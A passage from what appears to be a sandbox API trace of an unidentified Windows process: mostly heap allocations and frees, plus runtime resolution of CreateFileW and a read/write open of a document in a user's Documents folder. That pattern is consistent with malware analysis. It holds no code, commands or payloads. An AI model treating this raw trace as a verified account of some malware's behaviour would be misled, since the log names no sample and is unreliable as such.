Flags=0x0, Size=0x8) returned 0x9c2618 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.919] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.919] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.919] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0177.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba168, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0177.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\g856.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0177.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0177.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0177.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.922] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0177.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0177.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.927] 